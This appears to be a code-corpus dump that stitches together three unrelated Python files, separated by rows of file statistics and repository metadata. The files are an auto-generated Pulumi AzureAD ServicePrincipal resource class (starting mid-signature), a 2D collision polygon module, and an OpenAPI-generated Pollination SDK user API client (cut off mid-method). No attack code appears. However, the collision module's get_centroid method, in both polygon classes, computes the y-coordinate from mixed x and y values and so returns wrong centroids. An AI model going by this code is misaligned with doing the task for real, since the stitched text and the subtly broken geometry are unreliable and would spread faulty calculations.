app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
application_id: Optional[pulumi.Input[str]] = None,
oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]]] = None,
oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a Service Principal associated with an Application within Azure Active Directory.
> **NOTE:** If you're authenticating using a Service Principal then it must have permissions to both `Read and write all applications` and `Sign in and read user profile` within the `Windows Azure Active Directory` API. Please see The Granting a Service Principal permission to manage AAD for the required steps.
## Example Usage
```python
import pulumi
import pulumi_azuread as azuread
example_application = azuread.Application("exampleApplication",
display_name="example",
homepage="http://homepage",
identifier_uris=["http://uri"],
reply_urls=["http://replyurl"],
available_to_other_tenants=False,
oauth2_allow_implicit_flow=True)
example_service_principal = azuread.ServicePrincipal("exampleServicePrincipal",
application_id=example_application.application_id,
app_role_assignment_required=False,
tags=[
"example",
"tags",
"here",
])
```
## Import
Azure Active Directory Service Principals can be imported using the `object id`, e.g.
```sh
$ pulumi import azuread:index/servicePrincipal:ServicePrincipal test 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] app_role_assignment_required: Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
:param pulumi.Input[str] application_id: The App ID of the Application for which to create a Service Principal.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]] oauth2_permission_scopes: A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]] oauth2_permissions: (**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags to apply to the Service Principal.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServicePrincipalArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Service Principal associated with an Application within Azure Active Directory.
> **NOTE:** If you're authenticating using a Service Principal then it must have permissions to both `Read and write all applications` and `Sign in and read user profile` within the `Windows Azure Active Directory` API. Please see The Granting a Service Principal permission to manage AAD for the required steps.
## Example Usage
```python
import pulumi
import pulumi_azuread as azuread
example_application = azuread.Application("exampleApplication",
display_name="example",
homepage="http://homepage",
identifier_uris=["http://uri"],
reply_urls=["http://replyurl"],
available_to_other_tenants=False,
oauth2_allow_implicit_flow=True)
example_service_principal = azuread.ServicePrincipal("exampleServicePrincipal",
application_id=example_application.application_id,
app_role_assignment_required=False,
tags=[
"example",
"tags",
"here",
])
```
## Import
Azure Active Directory Service Principals can be imported using the `object id`, e.g.
```sh
$ pulumi import azuread:index/servicePrincipal:ServicePrincipal test 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param ServicePrincipalArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServicePrincipalArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
application_id: Optional[pulumi.Input[str]] = None,
oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]]] = None,
oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServicePrincipalArgs.__new__(ServicePrincipalArgs)
__props__.__dict__["app_role_assignment_required"] = app_role_assignment_required
if application_id is None and not opts.urn:
raise TypeError("Missing required property 'application_id'")
__props__.__dict__["application_id"] = application_id
__props__.__dict__["oauth2_permission_scopes"] = oauth2_permission_scopes
if oauth2_permissions is not None and not opts.urn:
warnings.warn("""[NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""", DeprecationWarning)
pulumi.log.warn("""oauth2_permissions is deprecated: [NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""")
__props__.__dict__["oauth2_permissions"] = oauth2_permissions
__props__.__dict__["tags"] = tags
__props__.__dict__["app_roles"] = None
__props__.__dict__["display_name"] = None
__props__.__dict__["object_id"] = None
super(ServicePrincipal, __self__).__init__(
'azuread:index/servicePrincipal:ServicePrincipal',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalAppRoleArgs']]]]] = None,
application_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]]] = None,
oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]]] = None,
object_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'ServicePrincipal':
"""
Get an existing ServicePrincipal resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] app_role_assignment_required: Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalAppRoleArgs']]]] app_roles: A collection of `app_roles` blocks as documented below. For more information [official documentation](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
:param pulumi.Input[str] application_id: The App ID of the Application for which to create a Service Principal.
:param pulumi.Input[str] display_name: Display name for the permission that appears in the admin consent and app assignment experiences.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionScopeArgs']]]] oauth2_permission_scopes: A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePrincipalOauth2PermissionArgs']]]] oauth2_permissions: (**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
:param pulumi.Input[str] object_id: The Object ID of the Service Principal.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags to apply to the Service Principal.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServicePrincipalState.__new__(_ServicePrincipalState)
__props__.__dict__["app_role_assignment_required"] = app_role_assignment_required
__props__.__dict__["app_roles"] = app_roles
__props__.__dict__["application_id"] = application_id
__props__.__dict__["display_name"] = display_name
__props__.__dict__["oauth2_permission_scopes"] = oauth2_permission_scopes
__props__.__dict__["oauth2_permissions"] = oauth2_permissions
__props__.__dict__["object_id"] = object_id
__props__.__dict__["tags"] = tags
return ServicePrincipal(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="appRoleAssignmentRequired")
def app_role_assignment_required(self) -> pulumi.Output[Optional[bool]]:
"""
Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
"""
return pulumi.get(self, "app_role_assignment_required")
@property
@pulumi.getter(name="appRoles")
def app_roles(self) -> pulumi.Output[Sequence['outputs.ServicePrincipalAppRole']]:
"""
A collection of `app_roles` blocks as documented below. For more information [official documentation](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
"""
return pulumi.get(self, "app_roles")
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> pulumi.Output[str]:
"""
The App ID of the Application for which to create a Service Principal.
"""
return pulumi.get(self, "application_id")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
Display name for the permission that appears in the admin consent and app assignment experiences.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="oauth2PermissionScopes")
def oauth2_permission_scopes(self) -> pulumi.Output[Sequence['outputs.ServicePrincipalOauth2PermissionScope']]:
"""
A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
"""
return pulumi.get(self, "oauth2_permission_scopes")
@property
@pulumi.getter(name="oauth2Permissions")
def oauth2_permissions(self) -> pulumi.Output[Sequence['outputs.ServicePrincipalOauth2Permission']]:
"""
(**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
"""
return pulumi.get(self, "oauth2_permissions")
@property
@pulumi.getter(name="objectId")
def object_id(self) -> pulumi.Output[str]:
"""
The Object ID of the Service Principal.
"""
return pulumi.get(self, "object_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of tags to apply to the Service Principal.
"""
return pulumi.get(self, "tags")
| 58.662651 | 356 | 0.703978 | 3,383 | 29,214 | 5.871712 | 0.080402 | 0.073097 | 0.051651 | 0.056635 | 0.890304 | 0.869966 | 0.866391 | 0.853403 | 0.830598 | 0.808347 | 0 | 0.010659 | 0.203601 | 29,214 | 497 | 357 | 58.780684 | 0.843119 | 0.392688 | 0 | 0.679245 | 1 | 0.022642 | 0.226222 | 0.105145 | 0 | 0 | 0 | 0 | 0 | 1 | 0.154717 | false | 0.003774 | 0.026415 | 0 | 0.275472 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3aacaa453b7af23f6394afdf33f4c1717d2abdbd | 6,218 | py | Python | collision/poly.py | nightimer-AU/collision | 0a140ee70f479fcdab7e2284f533c256d5a2f06a | [
"MIT"
] | 37 | 2018-10-16T04:41:42.000Z | 2022-03-06T17:44:23.000Z | collision/poly.py | nightimer-AU/collision | 0a140ee70f479fcdab7e2284f533c256d5a2f06a | [
"MIT"
] | 9 | 2019-12-28T07:30:33.000Z | 2021-11-11T11:18:33.000Z | collision/poly.py | nightimer-AU/collision | 0a140ee70f479fcdab7e2284f533c256d5a2f06a | [
"MIT"
] | 10 | 2019-03-18T14:40:30.000Z | 2022-02-22T12:02:14.000Z | import math
from .util import Vector
from . import tripy
POLY_RECALC_ATTRS = ["angle"]
class Poly:
def __init__(self, pos, points, angle=0):
self.pos = pos
self.__dict__["angle"] = angle
self.set_points(points)
@classmethod
def from_box(cls, center, width, height):
hw = width / 2
hh = height / 2
c = cls(center, [Vector(-hw, -hh), Vector(hw, -hh), Vector(hw, hh), Vector(-hw, hh)])
return c
def __setattr__(self, key, val):
self.__dict__[key] = val
if key in POLY_RECALC_ATTRS:
self._recalc()
def set_points(self, points):
if tripy.is_clockwise(points):
points = points[::-1]
length_changed = len(self.base_points) != len(points) if hasattr(self, "base_points") else True
if length_changed:
self.rel_points = []
self.edges = []
self.normals = []
for i in range(len(points)):
self.rel_points.append(Vector(0, 0))
self.edges.append(Vector(0, 0))
self.normals.append(Vector(0, 0))
self.base_points = points
self._recalc()
def _recalc(self):
l = range(len(self.base_points))
for i in l:
self.rel_points[i].set(self.base_points[i])
if self.angle != 0:
self.rel_points[i] = self.rel_points[i].rotate(self.angle)
for i in l:
p1 = self.rel_points[i]
p2 = self.rel_points[i+1] if i < len(self.rel_points) - 1 else self.rel_points[0]
e = self.edges[i] = p2-p1
self.normals[i] = e.perp().normalize()
@property
def points(self):
pos = self.pos
return [pos+point for point in self.rel_points]
@property
def aabb(self):
points = self.points
x_min = points[0].x
y_min = points[0].y
x_max = points[0].x
y_max = points[0].y
for point in points:
if point.x < x_min: x_min = point.x
elif point.x > x_max: x_max = point.x
if point.y < y_min: y_min = point.y
elif point.y > y_max: y_max = point.y
return ((x_min,y_min), (x_max,y_min), (x_min,y_max), (x_max,y_max))
def get_centroid(self):
cx = 0
cy = 0
ar = 0
for i in range(len(self.rel_points)):
p1 = self.rel_points[i]
p2 = self.rel_points[0] if i == len(self.rel_points) - 1 else self.rel_points[i+1]
a = p1.x * p2.y - p2.x * p1.y
cx += (p1.x + p2.x) * a
cy += (p1.x + p2.y) * a
ar += a
ar = ar * 3
cx = cx / ar
cy = cy / ar
return Vector(cx, cy)
def __str__(self):
r = "Poly [\n\tpoints = [\n"
for p in self.points:
r += "\t\t{}\n".format(str(p))
r += "\t]\n"
r += "\tpos = {}\n\tangle = {}\n".format(self.pos, self.angle)
r += "]"
return r
def __repr__(self):
return self.__str__()
class Concave_Poly():
def __init__(self, pos, points, angle=0):
self.pos = pos
self.__dict__["angle"] = angle
self.set_points(points)
def __setattr__(self, key, val):
self.__dict__[key] = val
if key in POLY_RECALC_ATTRS:
self._recalc()
def set_points(self, points):
if tripy.is_clockwise(points):
points = points[::-1]
length_changed = len(self.base_points) != len(points) if hasattr(self,"base_points") else True
if length_changed:
self.rel_points = []
self.tris = []
self.edges = []
self.normals = []
for i in range(len(points)):
self.rel_points.append(Vector(0,0))
self.edges.append(Vector(0,0))
self.normals.append(Vector(0,0))
self.base_points = points
self._calculate_tris()
self._recalc()
def _recalc(self):
l = range(len(self.base_points))
for i in l:
self.rel_points[i].set(self.base_points[i])
if self.angle != 0:
self.rel_points[i] = self.rel_points[i].rotate(self.angle)
for i in l:
p1 = self.rel_points[i]
p2 = self.rel_points[i+1] if i < len(self.rel_points) - 1 else self.rel_points[0]
e = self.edges[i] = p2-p1
self.normals[i] = e.perp().normalize()
self._update_tris()
def _calculate_tris(self):
self.tris = [Poly(self.pos, points, self.angle) for points in tripy.earclip(self.base_points)]
def _update_tris(self):
for tri in self.tris:
tri.angle = self.angle
tri.pos = self.pos
@property
def points(self):
templist = []
for p in self.rel_points:
templist.append(p+self.pos)
return templist
@property
def aabb(self):
points = self.points
x_min = points[0].x
y_min = points[0].y
x_max = points[0].x
y_max = points[0].y
for point in points:
if point.x < x_min: x_min = point.x
elif point.x > x_max: x_max = point.x
if point.y < y_min: y_min = point.y
elif point.y > y_max: y_max = point.y
return ((x_min,y_min), (x_max,y_min), (x_min,y_max), (x_max,y_max))
def get_centroid(self):
cx = 0
cy = 0
ar = 0
for i in range(len(self.rel_points)):
p1 = self.rel_points[i]
p2 = self.rel_points[0] if i == len(self.rel_points) - 1 else self.rel_points[i+1]
a = p1.x * p2.y - p2.x * p1.y
cx += (p1.x + p2.x) * a
cy += (p1.x + p2.y) * a
ar += a
ar = ar * 3
cx = cx / ar
cy = cy / ar
return Vector(cx, cy)
def __str__(self):
r = "Concave_Poly [\n\tpoints = [\n"
for p in self.points:
r+= "\t\t{}\n".format(str(p))
r += "\t]\n"
r += "\tpos = {}\n\tangle = {}\n".format(self.pos, self.angle)
r += "]"
return r
def __repr__(self):
return self.__str__()
| 27.513274 | 103 | 0.514474 | 895 | 6,218 | 3.382123 | 0.101676 | 0.069376 | 0.12884 | 0.064751 | 0.83449 | 0.83449 | 0.83449 | 0.83449 | 0.83449 | 0.821275 | 0 | 0.018859 | 0.351882 | 6,218 | 225 | 104 | 27.635556 | 0.732258 | 0 | 0 | 0.83237 | 0 | 0 | 0.027179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121387 | false | 0 | 0.017341 | 0.011561 | 0.213873 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3ad7a79205019566de2cdea5ccc82be2abf89d89 | 22,573 | py | Python | pollination_sdk/api/user_api.py | pollination/python-sdk | 599e8dbfc6e547c5e18aa903b27c70d7ffef84e5 | [
"RSA-MD"
] | 2 | 2020-01-30T23:28:59.000Z | 2020-05-06T16:43:47.000Z | pollination_sdk/api/user_api.py | pollination/python-sdk | 599e8dbfc6e547c5e18aa903b27c70d7ffef84e5 | [
"RSA-MD"
] | 1 | 2020-10-02T18:00:25.000Z | 2020-10-02T18:00:25.000Z | pollination_sdk/api/user_api.py | pollination/python-sdk | 599e8dbfc6e547c5e18aa903b27c70d7ffef84e5 | [
"RSA-MD"
] | null | null | null | # coding: utf-8
"""
pollination-server
Pollination Server OpenAPI Definition # noqa: E501
The version of the OpenAPI document: 0.16.0
Contact: info@pollination.cloud
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from pollination_sdk.api_client import ApiClient
from pollination_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class UserApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_user(self, user_create, **kwargs): # noqa: E501
"""Register a new user # noqa: E501
Create a new user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user(user_create, async_req=True)
>>> result = thread.get()
:param user_create: (required)
:type user_create: UserCreate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: CreatedContent
"""
kwargs['_return_http_data_only'] = True
return self.create_user_with_http_info(user_create, **kwargs) # noqa: E501
def create_user_with_http_info(self, user_create, **kwargs): # noqa: E501
"""Register a new user # noqa: E501
Create a new user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_user_with_http_info(user_create, async_req=True)
>>> result = thread.get()
:param user_create: (required)
:type user_create: UserCreate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(CreatedContent, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'user_create'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_user" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'user_create' is set
if self.api_client.client_side_validation and ('user_create' not in local_var_params or # noqa: E501
local_var_params['user_create'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_create` when calling `create_user`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'user_create' in local_var_params:
body_params = local_var_params['user_create']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/user', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreatedContent', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_me(self, **kwargs): # noqa: E501
"""Get authenticated user profile. # noqa: E501
Get authenticated user profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_me(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: UserPrivate
"""
kwargs['_return_http_data_only'] = True
return self.get_me_with_http_info(**kwargs) # noqa: E501
def get_me_with_http_info(self, **kwargs): # noqa: E501
"""Get authenticated user profile. # noqa: E501
Get authenticated user profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_me_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(UserPrivate, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_me" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/user', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserPrivate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_roles(self, **kwargs): # noqa: E501
"""Get the authenticated user roles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_roles(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: list[str]
"""
kwargs['_return_http_data_only'] = True
return self.get_roles_with_http_info(**kwargs) # noqa: E501
def get_roles_with_http_info(self, **kwargs): # noqa: E501
"""Get the authenticated user roles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_roles_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(list[str], status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_roles" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyAuth', 'JWTAuth'] # noqa: E501
return self.api_client.call_api(
'/user/roles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[str]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def update_user_profile(self, user_update, **kwargs): # noqa: E501
"""Update the authenticated user # noqa: E501
Update the authenticated user profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_profile(user_update, async_req=True)
>>> result = thread.get()
:param user_update: (required)
:type user_update: UserUpdate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: UpdateAccepted
"""
kwargs['_return_http_data_only'] = True
return self.update_user_profile_with_http_info(user_update, **kwargs) # noqa: E501
def update_user_profile_with_http_info(self, user_update, **kwargs): # noqa: E501
"""Update the authenticated user # noqa: E501
Update the authenticated user profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_user_profile_with_http_info(user_update, async_req=True)
>>> result = thread.get()
:param user_update: (required)
:type user_update: UserUpdate
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(UpdateAccepted, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'user_update'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_user_profile" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'user_update' is set
if self.api_client.client_side_validation and ('user_update' not in local_var_params or # noqa: E501
local_var_params['user_update'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_update` when calling `update_user_profile`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
